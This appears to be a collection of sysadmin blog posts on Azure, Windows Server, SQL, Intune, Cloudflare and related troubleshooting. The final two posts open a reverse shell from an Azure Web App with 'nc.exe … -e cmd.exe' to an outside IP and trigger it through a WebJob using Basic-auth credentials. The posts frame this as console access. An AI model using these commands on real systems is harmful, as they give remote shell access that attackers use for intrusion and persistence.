Update ADFS 3.0 Communication Certificate

The best way is to use this script: https://gallery.technet.microsoft.com/scriptcenter/Update-the-Service-9e080ef8

If it fails, run the script as a local admin account, not a domain one.

You can also finish it manually. As a local admin account:

Set-AdfsSslCertificate -Thumbprint 2b02128a3fc867c65200e27bb1c25023d339f372

And as a domain account:

Set-AdfsCertificate -CertificateType Service-Communications -Thumbprint 2b02128a3fc867c65200e27bb1c25023d339f372
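
To verify both bindings afterwards, you can run these cmdlets on the ADFS server (and restart the adfssrv service if needed):

Get-AdfsSslCertificate
Get-AdfsCertificate -CertificateType Service-Communications
Restart-Service adfssrv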

Intune – Remove User – Remove-LocalUser : The term 'Remove-LocalUser' is not recognized as the name of a cmdlet, function, script file

I tried to use a PowerShell script deployed via Intune to remove a user from a Windows endpoint with the command:

Remove-LocalUser -Name "myuser"

It did not work, just because:

Remove-LocalUser : The term 'Remove-LocalUser' is not recognized as the name of a cmdlet, function, script file, or
operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try
again.
At C:\Program Files (x86)\Microsoft Intune Management
Extension\Policies\Scripts\05b2518c-c36d-4a05-84f7-6fac956d4cc6_c293361b-b3d3-48d9-8aca-f8ccf0a11330.ps1:1 char:1
+ Remove-LocalUser -Name "myuser"
+ ~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (Remove-LocalUser:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException

So the workaround is to use this:

"net user myuser /DELETE"|cmd

The full script:

$op = Get-LocalUser | Where-Object Name -eq "myuser" | Measure-Object
if ($op.Count -eq 0) {
    Write-Host "No User to Remove"
} else {
    "net user myuser /DELETE"|cmd
    Write-Host "User myuser has been Removed"
}
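
The likely root cause is that the Intune Management Extension runs PowerShell scripts in the 32-bit host by default, while the Microsoft.PowerShell.LocalAccounts module (which provides Remove-LocalUser) ships only in 64-bit PowerShell. A minimal wrapper, assuming you keep the Remove-LocalUser approach (or just enable "Run script in 64 bit PowerShell host" when assigning the script in Intune):

# Relaunch in 64-bit PowerShell when Intune starts the script in the 32-bit host,
# where Microsoft.PowerShell.LocalAccounts (Remove-LocalUser) is unavailable.
if ($env:PROCESSOR_ARCHITEW6432 -eq "AMD64") {
    & "$env:windir\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File $PSCommandPath
    exit $LASTEXITCODE
}
Remove-LocalUser -Name "myuser"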

Recovery Services vault – How to Disable Backup, Move to a new Recovery Services vault

1. Stop the backup without erasing data.
2. Disable soft delete in the Recovery Services vault.


3. Execute Script:

$RG = "backup-mig"
$VaultName = "backup-mig"
$VMName = "medicareiisql"
$vault = Get-AzRecoveryServicesVault -ResourceGroupName $RG -Name $VaultName
$Container = Get-AzRecoveryServicesBackupContainer -ContainerType AzureVM -Status Registered -VaultId $vault.ID -FriendlyName $VMName
$BackupItem = Get-AzRecoveryServicesBackupItem -Container $Container -WorkloadType AzureVM -VaultId $vault.ID
Disable-AzRecoveryServicesBackupProtection -Item $BackupItem -VaultId $vault.ID -RemoveRecoveryPoints -Force
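
To finish the move, you can protect the same VM in the new vault. A minimal sketch, assuming the new vault is named backup-new and you use its default policy (names are examples):

# Re-enable protection in the target vault (vault and policy names are hypothetical)
$newVault = Get-AzRecoveryServicesVault -ResourceGroupName $RG -Name "backup-new"
$policy = Get-AzRecoveryServicesBackupProtectionPolicy -Name "DefaultPolicy" -VaultId $newVault.ID
Enable-AzRecoveryServicesBackupProtection -ResourceGroupName $RG -Name $VMName -Policy $policy -VaultId $newVault.ID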

MS SQL (also Express) on Azure VM – TempDB on an ephemeral local disk

Fast SQL on Azure – in a nutshell:

  • TempDB on fast local disk
  • At least 3 disks for data and logs
  • Read-only caching for data disks

One of the most important things for SQL Server is to store TempDB on a fast, ephemeral local (temporary) disk. How to do it:

Install SQL Server and configure TempDB to live on the ephemeral D: drive (the startup script below creates D:\SQLTEMP – make sure SQL is configured to use the same folder).

Create two files on the C: drive:

StartSQL.bat:

PowerShell -Command "Set-ExecutionPolicy Unrestricted" >> "%TEMP%\StartupLog.txt" 2>&1
PowerShell C:\StartSQL.ps1 >> "%TEMP%\StartupLog.txt" 2>&1

StartSQL.ps1:

$SQLService = "SQL Server (MSSQLSERVER)"
$SQLAgentService = "SQL Server Agent (MSSQLSERVER)"
$tempfolder = "D:\SQLTEMP"
if (!(Test-Path -Path $tempfolder)) {
    New-Item -ItemType Directory -Path $tempfolder
}
# These are display names, so pass them via -DisplayName
Start-Service -DisplayName $SQLService
#Start-Service -DisplayName $SQLAgentService   # remove the # for non-Express editions

 

Set the Startup Type to Manual for the following services:

  • SQL Server (MSSQLSERVER)
  • SQL Server Agent (MSSQLSERVER)
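
You can do this from an elevated PowerShell as well (service names are for the default instance):

Set-Service -Name "MSSQLSERVER" -StartupType Manual
Set-Service -Name "SQLSERVERAGENT" -StartupType Manual   # skip on Express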

Configure a Task Scheduler task that runs StartSQL.bat at startup (run as SYSTEM with highest privileges), as shown below:
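
A minimal sketch of creating that task with PowerShell, assuming the batch file sits at C:\StartSQL.bat (the task name is an example):

# Run C:\StartSQL.bat at boot as SYSTEM with highest privileges
$action = New-ScheduledTaskAction -Execute "C:\StartSQL.bat"
$trigger = New-ScheduledTaskTrigger -AtStartup
$principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -RunLevel Highest
Register-ScheduledTask -TaskName "StartSQL" -Action $action -Trigger $trigger -Principal $principal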

An additional tip is to use at least 3 disks for data and logs. Just attach 3 data disks and run this PowerShell, which configures a striped volume for you:

$disks = Get-PhysicalDisk -CanPool $true
New-StoragePool -FriendlyName StoragePool1 -StorageSubsystemFriendlyName "*" -PhysicalDisks $disks
New-VirtualDisk -FriendlyName "sql-stripe" -StoragePoolFriendlyName "StoragePool1" -Interleave 65536 -AutoNumberOfColumns -ProvisioningType Fixed -ResiliencySettingName "Simple" -UseMaximumSize
Get-VirtualDisk -FriendlyName sql-stripe | Get-Disk | Initialize-Disk -PassThru | New-Partition -DriveLetter F -UseMaximumSize | Format-Volume

 

Enable read-only caching on the disk(s) hosting the data files.
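
A minimal sketch of doing this with Az PowerShell (VM, resource group and disk names are hypothetical):

# Enable read-only host caching on a data disk, then apply the change
$vm = Get-AzVM -ResourceGroupName "sql-rg" -Name "sqlvm01"
Set-AzVMDataDisk -VM $vm -Name "sqlvm01-data0" -Caching ReadOnly
Update-AzVM -ResourceGroupName "sql-rg" -VM $vm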

 

More information: https://docs.microsoft.com/en-us/azure/azure-sql/virtual-machines/windows/performance-guidelines-best-practices

WebPage for stopping and starting Azure VMs

Quite often I get requests for automation that lets people who do not have access to the Azure environment start and stop virtual machines.

I do not think it is a very safe solution, but it may be useful to someone – and certainly for training purposes covering:

  • Static Web Apps
  • Azure identity platform and authorization services – App Registrations
  • identity and access management (IAM)

https://github.com/MariuszFerdyn/AzureStartStopVM

 


Group Policy – Merging / Scalanie GPO

Recently I have been dealing with broadly understood security. Everyone is talking about Cloud Security these days, but sometimes you have to go back to the basics! In most large companies, a fundamental element of security is the proper configuration of workstations, and when you have thousands of them, that of course means GPO. GPO helps you get a grip on the world of workstations and security, but there is a lot to configure here – it is worth looking at the CIS build kits:

https://www.cisecurity.org/cis-securesuite/cis-securesuite-build-kit-content/

Security baselines are available for:

  • Microsoft Internet Explorer 9
  • Microsoft Internet Explorer 10
  • Microsoft Internet Explorer 11
  • Microsoft Office 2013
  • Microsoft Office 2016
  • Microsoft Office Access 2013
  • Microsoft Office Access 2016
  • Microsoft Office Excel 2013
  • Microsoft Office Excel 2016
  • Microsoft Office PowerPoint 2013
  • Microsoft Office PowerPoint 2016
  • Microsoft Office Word 2013
  • Microsoft Office Word 2016
  • Microsoft Outlook 2013
  • Microsoft Outlook 2016
  • Microsoft Windows XP
  • Microsoft Windows 7
  • Microsoft Windows 8
  • Microsoft Windows 8.1
  • Microsoft Windows 10 Enterprise
  • Microsoft Windows Server 2003
  • Microsoft Windows Server 2008
  • Microsoft Windows Server 2008 R2
  • Microsoft Windows Server 2012
  • Microsoft Windows Server 2012 R2
  • Microsoft Windows Server 2016
  • Microsoft Windows Server 2019

Real Example:

When you download these policies, they are split by Computer, User and category, so sometimes you need to merge them, especially for loopback processing (VDI). There are some community PowerShell scripts for this, but I do not trust scripts from the internet – I prefer a well-known brand like Microsoft. BTW: if you do not trust your computer vendor or Microsoft, you must change them.

To merge GPOs you can use Microsoft Security Compliance Manager (https://www.microsoft.com/en-us/download/details.aspx?id=53353). You can install it on Windows 10.

The process of merging GPOs is:

  1. Create a backup of the GPOs that you want to merge (Group Policy Management).
  2. Run Microsoft Security Compliance Manager.
  3. Import the policies to merge.

  4. Select a policy and select Compare / Merge.

  5. Select the policy to merge with.

  6. Select Merge Baselines.

  7. Finally, just export the result as a GPO backup and import it into Group Policy Management.

This doesn’t work for Preferences.


IoT Solution Concept with using Raspberry PI as a Gateway connected to two different WiFi at the same time

When you design IoT solutions there are two approaches: you can connect IoT devices directly to Azure IoT Central or Azure IoT Hub, or you can connect them via a gateway.

For a gateway, you can use a low-cost computer/controller like a Raspberry Pi. IoT devices can connect to the gateway using the following protocols:

  • WiFi Internal wlan1
  • Bluetooth
  • Bluetooth Low Energy

The more complicated part is connecting the gateway to Azure IoT Hub, Azure IoT Central or any other cloud service. We can use the following:

  • WiFi External wlan0
  • Ethernet
  • GPRS
  • LoRaWAN

Sample diagram:

You can use WiFi for both – the same card but a different frequency (2.4 GHz / 5 GHz) – or just two different WiFi cards.

When using two different network cards to connect the Raspberry Pi to two different WiFi networks at the same time, you need a configuration similar to this one (file /etc/network/interfaces):

root@raspberrypi:~# cat /etc/network/interfaces
auto lo

iface lo inet loopback
iface eth0 inet dhcp

auto wlan0
allow-hotplug wlan0
iface wlan0 inet dhcp
wpa-ssid fastsmsnet2
wpa-psk wifi-password

auto wlan1
allow-hotplug wlan1
iface wlan1 inet dhcp
wireless-essid TELLO-5A2CAA

 

# interfaces(5) file used by ifup(8) and ifdown(8)

# Please note that this file is written to be used with dhcpcd
# For static IP, consult /etc/dhcpcd.conf and 'man dhcpcd.conf'

 

# Include files from /etc/network/interfaces.d:
#source-directory /etc/network/interfaces.d
root@raspberrypi:~#

PS: As you can see, this gateway will be used as a drone controller.

Azure Application Gateway – The root certificate of the server certificate used by the backend does not match the trusted root certificate added to the application gateway.

If you run into this error using Azure Application Gateway v2:

The root certificate of the server certificate used by the backend does not match the trusted root certificate added to the application gateway. Ensure that you add the correct root certificate to whitelist the backend

First check whether your backend web server serves a single-level certificate. If it does not, try the following (if it does, read to the end):

Create another listener that uses e.g. port 80 – it will not actually be used – we just need to be able to delete everything connected with the existing 443 listener, including health probes and rules. You can also delete the Application Gateway and create a new one that uses only port 80/HTTP.

Run the following script:

Connect-AzAccount
$appgwName = "mariuszcert-appgateway"
$resgpName = "MariusCertTest"
$certName = "RootPrivateCert"
$gw = Get-AzApplicationGateway -Name $appgwName -ResourceGroupName $resgpName
$gw = Add-AzApplicationGatewayTrustedRootCertificate -ApplicationGateway $gw -Name $certName -CertificateFile "c:\privatecer.cer"
$gw = Add-AzApplicationGatewayBackendHttpSettings -ApplicationGateway $gw -Name "dwa" -Port 443 -Protocol Https -CookieBasedAffinity Enabled -PickHostNameFromBackendAddress -TrustedRootCertificate $gw.TrustedRootCertificates[0]
$gw = Set-AzApplicationGateway -ApplicationGateway $gw

Now you can add Listener and rules, similar to this one:

Add Rules for https (443):

And after that, you can delete the rules and listeners connected with port 80.

If you still see the error, the final solution is to create an Application Gateway v1 (Standard): it does not need trusted root certificates, so it can work with single-level certificates.

Remote Desktop (RDP) – Shadow Session

Sometimes we need to see what the user is doing on the remote desktop session. How to do it:

Connect to remote desktop:

Run cmd.exe and issue:

query session

You should see all sessions, like here:

Connect to the session:

mstsc /shadow:session_id

mstsc /shadow:16 /noConsentPrompt – connect without prompting the user (you must allow this in GPO)

mstsc /shadow:16 /control – you can also control the user session.

GPO settings:
Computer Configuration>Policies>Administrative Templates>Windows Components>Remote Desktop Services>Remote Desktop Session Host>Connections

Set rules for remote control of Remote Desktop Services user sessions>Enabled>Full Control with User’s Permission, like here:
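
If you prefer, the same policy can be set directly in the registry – to my knowledge the Shadow value maps to the policy options (1 = Full Control with user's permission):

# Registry equivalent of the GPO setting (Shadow = 1: Full Control with user's permission)
$key = "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services"
New-Item -Path $key -Force | Out-Null
New-ItemProperty -Path $key -Name Shadow -PropertyType DWord -Value 1 -Force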



Learning Download Center – Access Denied

If you are an MCT (Microsoft Certified Trainer), cannot access the Learning Download Center (https://learningdownloadcenter.microsoft.com/), and see the error:

Access Denied
Microsoft Certified Trainers should login with Microsoft Certification Account.
Microsoft Partners should login with their active Microsoft Partner Account. For more information on Microsoft Partner Account click here.
For further support please contact Microsoft Support.

You have to:

  1. Visit the Microsoft Certification Dashboard Migrate page (https://mcp.microsoft.com/MCP/Home/Migrate) using Internet Explorer (the recommended browser).
  2. Sign in with the Microsoft account and password that you would like to link with your Microsoft Certification profile.
  3. Enter the Access Code along with your MC ID to have your Microsoft account associated with your Microsoft Certification record. You must acquire the access code by creating a New Discussion on the Microsoft Trainer Forum (https://trainingsupport.microsoft.com/en-us/tcmct/forum). It is the only way to get support with this, and you will receive the code via Private Message – yes, there is private message functionality: look at the topic you create and you will see the Private Message indicator.

Microsoft Azure Recovery Services (MARS) agent – from the Azure Administrator's Journal

If you cannot authenticate to the Recovery Services vault, make sure the time on the server is set correctly. The agent generates a SAS token that is valid for one hour based on the clock in Azure, and if the server clock is off by more than an hour, authentication will fail.

This is usually accompanied by the error:

Invalid vault credentials provided. The file is either corrupted or does not have the latest credentials associated with recovery service. (ID: 34513) We recommend you download a new vault credentials file from the portal and use it within 2 days.

The logs are stored in C:\Program Files\Microsoft Azure Recovery Service Agent\temp, and in the CBEngineCurr.errlog file you will probably find something similar to:

Client assertion is not within its valid time range. Current time: 2020-06-27T17:23:32.8614131Z, expiry time of assertion 2020-06-27T16:34:05.0000000Z.

If the System State backup ends with an error:

Error in backup of C:\windows\systemroot\ during enumerate: Error [0x8007007b] The filename, directory name, or volume label syntax is incorrect.

You need to fix the VSS writers' entries in the registry (remove all leading "/") according to https://support.microsoft.com/en-us/help/4053355/microsoft-azure-recovery-services-agent-system-state-backup-failure.

 

Windows 10 and Windows Server 2016/2019 – NAT

If you ever need to run a VM on a VM (nested virtualization – already possible in Azure on Dv3 machines), NAT will probably come in handy. How to set it up on Windows Server 2016 and Windows 10, step by step:

New-VMSwitch -SwitchName "NAT" -SwitchType Internal

New-NetIPAddress -IPAddress 172.16.0.1 -PrefixLength 24 -InterfaceAlias "vEthernet (NAT)"

New-NetNat -Name NATnetwork -InternalIPInterfaceAddressPrefix 172.16.0.0/24

 

You can also use this on your laptop.
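
Note that New-NetNat does not provide DHCP, so guests on the NAT switch need static addresses, for example inside the guest (interface alias and DNS server are examples):

# Inside the guest VM: static IP on the NAT network
New-NetIPAddress -InterfaceAlias "Ethernet" -IPAddress 172.16.0.2 -PrefixLength 24 -DefaultGateway 172.16.0.1
Set-DnsClientServerAddress -InterfaceAlias "Ethernet" -ServerAddresses 8.8.8.8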

 


 

How to get AKS cluster – Provisioning State: Scaling – back to live

Sometimes during a scaling operation on Azure Kubernetes Service, the cluster hangs in Provisioning State: Scaling.

Manually deleting VMs from the MC* resource group may also have had some impact on this.

Solution: upgrade the AKS cluster to the same Kubernetes version it is currently running (in this case, 1.13.10) from the Azure CLI or Cloud Shell.

Step by step:

az aks upgrade --resource-group myResourceGroup --name myAKSCluster --kubernetes-version 1.13.10

Check status:

az aks show --resource-group myResourceGroup --name myAKSCluster --output table


Windows Virtual Desktop | Microsoft Azure – resources

During a virtual meeting of the Warsaw Windows Users and Specialists Group (WGUiSW), as part of the Microsoft Azure in Your Company series and my "From the Administrator's Journal" musings, I presented the capabilities of Windows Virtual Desktop.

Here is a set of additional materials published by Christiaan from Microsoft:

Ignite the Tour session + deck (2019 fall release):
https://techcommunity.microsoft.com/t5/microsoft-ignite-the-tour-2019/a-real-world-look-at-windows-virtual-desktop-the-best/m-p/1111711

How to migrate Virtual Desktop Infrastructure (VDI) to Azure and Windows Virtual Desktop (2020 – spring update):
https://www.youtube.com/watch?v=rkKaWT-tN54

Windows Virtual Desktop updates for admins (2020 – spring update):
https://www.youtube.com/watch?v=zmsTD9Hd-xY&t=1s

You can watch all the recordings (including comprehensive demos) in HQ from our last virtual event, Accelerate Your Windows Virtual Desktop Deployment (2020 – spring update). (Register and the on-demand link will arrive via email):
https://info.microsoft.com/ww-registration-windows-virtual-desktop-virtual-event.html?ocid=AID3008891_QSG_BLOG_405824

Resources for MS partners:

List of resources for partners, including a technical level 100 and 300 deep-dive deck (2019 fall release):
https://www.microsoft.com/azure/partners/b/migrate/windows-virtual-desktop

Do not forget about the WVD Management UX:
https://github.com/Azure/RDS-Templates/tree/master/wvd-templates/wvd-management-ux/

My previous post about Windows Virtual Desktop:

Migrating Existing RDS environment to Windows Desktop in Azure

Windows Server 2019 + Docker Desktop – autostart at computer startup (boot)

Since 2016 you have been able to run Linux containers on Windows 7; since 2018, using Windows Server 2019, you can run Linux containers on Windows Server as well.

Some companies don't accept Linux in their environment – in that case, we can run Linux containers on Windows Server 2019. Here is a method to start docker-compose at Windows startup (when the computer boots).

Create a startup file:

E.g. in C:\tmp\bloom_onPrem\startup.ps1

Write-Host "Waiting 300 sec..."
start "C:\Program Files\Docker\Docker\Docker Desktop.exe"
Start-Service -Name com.docker.service
Start-Sleep 300
Write-Host "Starting containers..."
docker-compose --file c:\tmp\bloom_onPrem\docker-compose.yml up -d
Write-Host "Waiting 15 sec..."
Start-Sleep 15

To start it automatically when the server boots, create a ScheduledJob with New-JobTrigger – like here:

Open PowerShell as an Administrator and do:

$trigger = New-JobTrigger -AtStartup -RandomDelay 00:00:30
Register-ScheduledJob -Trigger $trigger -FilePath C:\tmp\bloom_onPrem\startup.ps1 -Name BloomOnPrem

Display Scheduled Job:

Get-ScheduledJob

or

Get-ScheduledJob|Get-JobTrigger

You can view this definition in Task Scheduler:

BTW: stop.bat file can be:

docker-compose --file c:\tmp\bloom_onPrem\docker-compose.yml down
pause

You can expose your containers to the internet using IIS Reverse Proxy:

https://docs.microsoft.com/en-us/iis/extensions/url-rewrite-module/reverse-proxy-with-url-rewrite-v2-and-application-request-routing
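
A minimal sketch of such a rewrite rule in the site's web.config, assuming URL Rewrite and ARR (with proxy enabled) are installed and the container is published on localhost:8080 (the port is an example):

<system.webServer>
  <rewrite>
    <rules>
      <!-- Forward all requests to the container published on localhost:8080 -->
      <rule name="ReverseProxyToContainer" stopProcessing="true">
        <match url="(.*)" />
        <action type="Rewrite" url="http://localhost:8080/{R:1}" />
      </rule>
    </rules>
  </rewrite>
</system.webServer>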

PowerShell and .NET for Jupyter Notebooks – Azure Notebooks, what is the future?


Jupyter Notebooks, which let us add live, runnable application code to the documentation being displayed, have become popular. What's more, the result of running the code is immediately visible in the documentation – as below:

Notebooks can also display graphics, which is why people preparing AI models love Jupyter Notebooks so much:

Jupyter Notebooks have long been available for Python, F# and R, but the news that the functionality is also available for PowerShell and, for a while now, .NET has gone largely unnoticed. We can practice using this link:

https://mybinder.org/v2/gh/dotnet/interactive/master?urlpath=lab

It is worth mentioning that Azure Notebooks Preview has been available for a long time – I am waiting for it to be integrated with Cloud Shell, so exercises and configurations for Azure can be published nicely.

Here you can see how it works – just log in using your organization account to be able to execute the code by pressing Shift+Enter:

https://azurenotebooks-mariuszferdyn.notebooks.azure.com/j/lab/tree/KolejnaLiczba.ipynb

By the way, children have long been learning Python using a very nice Runestone Interactive-based tool:

http://python.oeiizk.edu.pl/ematerialy/python_obliczenia/0_piaskownica.html#

How to create Azure Monitor Alerts based on policy definitions?

  1. First of all, you need to have a Log Analytics workspace that collects the Activity log:

    More info: https://docs.microsoft.com/en-us/azure/azure-monitor/platform/activity-log-collect

  2. Go to Monitor.
  3. Go to the Alerts tab (you can go directly to this link: https://portal.azure.com/#blade/Microsoft_Azure_Monitoring/AzureMonitoringBrowseBlade/alertsV2).
  4. Press New alert rule.
  5. Press Select resource.
  6. Select the subscription and the Log Analytics workspace that collects the Activity log.
  7. As the signal, choose Custom log search.
  8. Type a query, e.g.: AzureActivity | where TimeGenerated > ago(60d) and OperationNameValue startswith "Microsoft.Authorization/roleDefinitions/write"
  9. Configure the alert logic, e.g. number of results greater than 0, plus the period and frequency.
  10. Create an action group – who should receive the alerts.
  11. Specify the subject line and the alert rule name.
  12. Save the alert.

References 1: https://docs.microsoft.com/en-us/azure/azure-monitor/platform/activity-log-collect

References 2: https://docs.microsoft.com/en-us/azure/azure-monitor/platform/alerts-log

DevExpress – Error: Unable to get property ‘validator’ of undefined or null reference

In case of Error:

Error: Unable to get property ‘validator’ of undefined or null reference

Add to web.config (at the end, in the <devExpress> section):

<resources>
  <add type="ThirdParty" />
  <add type="DevExtreme" />
</resources>


DevExpress – Incorrect route to ASPxUploadProgressHandlerPage.ashx

In case of error:

System.Exception

Incorrect route to ASPxUploadProgressHandlerPage.ashx. Please use the IgnoreRoute method to ignore this handler’s route when processing requests.

Please edit the RouteConfig.cs file, adding:

routes.IgnoreRoute("{resource}.aspx/{*pathInfo}");
routes.IgnoreRoute("{resource}.asmx/{*pathInfo}");
routes.IgnoreRoute("{resource}.ashx/{*pathInfo}");


Please do not forget to add this to the Layout file:


@Html.DevExpress().GetStyleSheets(
    new StyleSheet { ExtensionSuite = ExtensionSuite.NavigationAndLayout },
    new StyleSheet { ExtensionSuite = ExtensionSuite.Editors }
)

@Html.DevExpress().GetScripts(
    new Script { ExtensionSuite = ExtensionSuite.NavigationAndLayout },
    new Script { ExtensionSuite = ExtensionSuite.Editors }
)


Linux Azure Files mount problem

In the case of:

mount error(13): Permission denied

or

mount error(16): Device or resource busy

your kernel probably doesn't support CIFS encryption, so please disable "Secure transfer required"

And use this command:

sudo mount -t cifs //STORAGEACCOUNTNAME.file.core.windows.net/SHARENAME /mnt -o vers=2.1,username=STORAGEACCOUNTNAME,password=YOUR_STORAGE_KEY_ENDING_WITH==,dir_mode=0777,file_mode=0777,sec=ntlmssp

An unencrypted transfer works only when the VM is in the same region as the storage account.
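
To make the mount survive reboots, the usual pattern is a credentials file plus an /etc/fstab entry (names are placeholders):

# /etc/smbcredentials/STORAGEACCOUNTNAME.cred (chmod 600)
username=STORAGEACCOUNTNAME
password=YOUR_STORAGE_ACCOUNT_KEY

# /etc/fstab entry (single line)
//STORAGEACCOUNTNAME.file.core.windows.net/SHARENAME /mnt cifs vers=2.1,credentials=/etc/smbcredentials/STORAGEACCOUNTNAME.cred,dir_mode=0777,file_mode=0777,sec=ntlmssp 0 0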

If you receive something like this:

mount: wrong fs type, bad option, bad superblock on

you need to install cifs-utils:

sudo apt install cifs-utils

Troubleshooter:

https://gallery.technet.microsoft.com/Troubleshooting-tool-for-02184089

Magento install on Azure WebApp + Azure Database for MariaDB/MySQL server

If you try to install Magento the normal way on a Microsoft Azure WebApp using MariaDB or MySQL, you will probably receive an error:

 

[ERROR] Magento\Eav\Model\Entity\Attribute\Exception: Warning: SessionHandler::read(): Session data file is not created by your uid in /home/site/wwwroot/vendor/magento/framework/Session/SaveHandler/Native.php on line 22 in /home/site/wwwroot/vendor/magento/framework/ObjectManager/Factory/AbstractFactory.php:121Stack trace:#0 /home/site/wwwroot/vendor/magento/framework/ObjectManager/Factory/Dynamic/Developer.php(66): Magento\Framework\ObjectManager\Factory\AbstractFactory-

 

The solution is quite simple: during setup, choose to store sessions in the DB instead of files. After installation you can move sessions to Redis or back to files by adding:

session.save_handler = files

session.save_path = "var/www/magento2/var/session"

 

to the .user.ini file.

 

The next error you will see is connected with DB permissions:

General error: 1419 You do not have the SUPER privilege and

The solution is quite simple: set log_bin_trust_function_creators to ON in the DB server parameters in the Azure portal.
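
If you prefer the CLI, the same parameter can be set with az (server and resource group names are examples; for MariaDB use az mariadb server configuration set):

az mysql server configuration set --resource-group myRG --server-name mydbserver --name log_bin_trust_function_creators --value ON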

 

GCP App Engine via Cloudflare – Step by Step

Usually, it is wise to protect your application against DDoS, XSS, SQL injection and so on. Unfortunately, at this moment it is impossible to use Google Cloud Armor with Google App Engine. One solution is to use Azure Application Gateway with WAF, or Cloudflare. How to configure Cloudflare with App Engine, step by step:

  1. As usual, you must delegate the DNS zone to Cloudflare – an easy process after you register with Cloudflare.
  2. In the Google Cloud Console, go to the App Engine panel, then Settings and Custom domains, and add a Custom Domain.
  3. You need to verify the new domain by adding a TXT record to your DNS settings. You do this in Cloudflare. Please remember that if you are adding it for a subdomain, e.g. cc.wiadki.pl, you need to add the TXT record to the subdomain cc.wiadki.pl.
    If you have a problem with it, you can switch to adding a CNAME record instead. That worked better for me.
  4. After verifying the domain, Google will create an SSL certificate for it, but it does not work with Cloudflare at this moment, so you need to disable SSL security like here:

  5. Now you can add the A records in Cloudflare:

    You can also add IPV6 addresses.

  6. During my tests, full end-to-end encryption didn't work for me, so go to the SSL/TLS settings and select Flexible mode – like here:

    If you want to use Flexible mode for only one subdomain, you can do it using Page Rules, like here:

    In this way, only cc.wiadki.pl will be without end-to-end encryption.

  7. You can also use the Always Use HTTPS option to redirect from HTTP to HTTPS using Page Rules, like here:

    Or for all entries in your domain in SSL/TLS – Edge Certificates Settings:

     

    So for some time you can visit and test how this App Engine page works through the Cloudflare proxy:

    https://cc.wiadki.pl/

     

     

    After you enable Cloudflare for App Engine, please remember that App Engine will still be available at the *.appspot.com address, so protect it using a client certificate, a reverse connection, or at least an IP restriction to Cloudflare's ranges (https://www.cloudflare.com/ips/).

     

    More info:

    https://support.cloudflare.com/hc/en-us/articles/200170166-Best-Practices-DDoS-preventative-measures

     

     

     

Certificate-based authentication for Azure

The best way to authenticate to Azure from an application is to use Managed Identity. But sometimes that is not possible (e.g. on-prem), and then certificate-based authentication is more secure than a secret (password).

Here is a quick manual:

#Create Certificate
New-SelfSignedCertificate -Subject "CN=CertForMyApp" -CertStoreLocation "Cert:\CurrentUser\My" -KeyExportPolicy Exportable -KeySpec Signature
#Export Certificate from Store (mmc command)
#Create App registrations (portal.azure.com)
#Upload Certificate (portal.azure.com)
#Assign Permission (portal.azure.com)
#Check local Certificates
Get-ChildItem Cert:\ -Recurse|Select-String C2A35AA0BB502DF93AB92EF4CE8BC71CAD7318
#Connect to Azure
Connect-AzAccount -ApplicationId f3ac2214-e37b-4f3e-9023-29abad27c8 -Tenant e9823fe4-675d-4843-a547-4154fc131c -CertificateThumbprint C2A35AA0BB502DF93AB92EF4CE8BC71CAD7318

How to create Custom Read-Write role for Blob Storage in Azure

The best way is to use PowerShell in Cloud Shell. Prepare the environment:

cd \home
mkdir workingdir
cd workingdir

Write an existing role out in JSON format:

Get-AzRoleDefinition -Name "Storage Blob Data Contributor" | ConvertTo-Json | Out-File ReadWriteRole.json

Edit the file (set IsCustom to true, put the correct subscription in AssignableScopes, delete unnecessary actions, and give it a new Name and Description; the Id is not important):

vi ReadWriteRole.json

{
  "Name": "Custom Role Storage Blob Read Write",
  "Id": "ba92f5b4-2d11-453d-a403-e96b0029c9fe",
  "IsCustom": true,
  "Description": "Custom Role Allows for read, write access to Azure Storage blob containers and data",
  "Actions": [
    "Microsoft.Storage/storageAccounts/blobServices/containers/read",
    "Microsoft.Storage/storageAccounts/blobServices/containers/write",
    "Microsoft.Storage/storageAccounts/blobServices/generateUserDelegationKey/action"
  ],
  "NotActions": [],
  "DataActions": [
    "Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read",
    "Microsoft.Storage/storageAccounts/blobServices/containers/blobs/write"
  ],
  "NotDataActions": [],
  "AssignableScopes": [
    "/subscriptions/4b1caf79-6e4c-49d-8160-5853298"
  ]
}

Exit the editor by pressing Escape, then typing :wq and Enter.

Add New Custom Role:

New-AzRoleDefinition -InputFile ReadWriteRole.json

Display All Custom Roles:

Get-AzRoleDefinition | ? {$_.IsCustom -eq $true} | FT Name, IsCustom

And now you can use the new custom role in the portal.
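
To assign it from PowerShell instead, a minimal sketch with a hypothetical user and scope:

# Assign the custom role at storage-account scope (sign-in name and scope are examples)
New-AzRoleAssignment -SignInName "user@contoso.com" -RoleDefinitionName "Custom Role Storage Blob Read Write" -Scope "/subscriptions/<subscription-id>/resourceGroups/myRG/providers/Microsoft.Storage/storageAccounts/mystorage"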

Reverse shell from Azure Web App via Web Hook

In a previous article, I presented the idea of running netcat in a Web App and getting access to a shell that way. If you need it on demand, this solution can be more convenient. Just create a start.bat like this:

d:\home\site\wwwroot\nc.exe 40.113.139.194 443 -e cmd.exe

and upload it as a WebJob to the Web App.

And then you can always invoke it and make a connection to the shell:

$username = "`$webapprg09"
$password = "vzcXNeXmoltECLoALtLrYeincorect"
$base64AuthInfo = [Convert]::ToBase64String([Text.Encoding]::ASCII.GetBytes(("{0}:{1}" -f $username, $password)))
$userAgent = "powershell/1.0"
$apiUrl = "https://webapprg09.scm.azurewebsites.net/api/triggeredwebjobs/reverse/run"
Invoke-WebRequest -Uri $apiUrl -Headers @{Authorization=("Basic {0}" -f $base64AuthInfo)} -UserAgent $userAgent -Method POST -Debug

First, you need to start the listening server using:

netcat -l -p 443

Reverse shell to your WebApp – console access to an Azure WebApp from a text environment like bash

As far as I remember, console access to an Azure Web App has always been available via web browser – through Kudu's Console or the App Service Editor, where you can also upload files. It looks like this:

But it is not always convenient to use it via a web browser, especially when you are working over a poor internet connection or would like to monitor logs.

You can use netcat to establish a connection from the WebApp to your workstation. How to do it:

On the machine where you want to use the text console, install netcat using:

apt-get -y install netcat

and start waiting for the incoming connection. In this example, we will use port 443.

netcat -l -p 443

Upload nc.exe to your Web App (source: https://eternallybored.org/misc/netcat) and run it:

nc.exe 40.113.139.194 443 -e cmd.exe

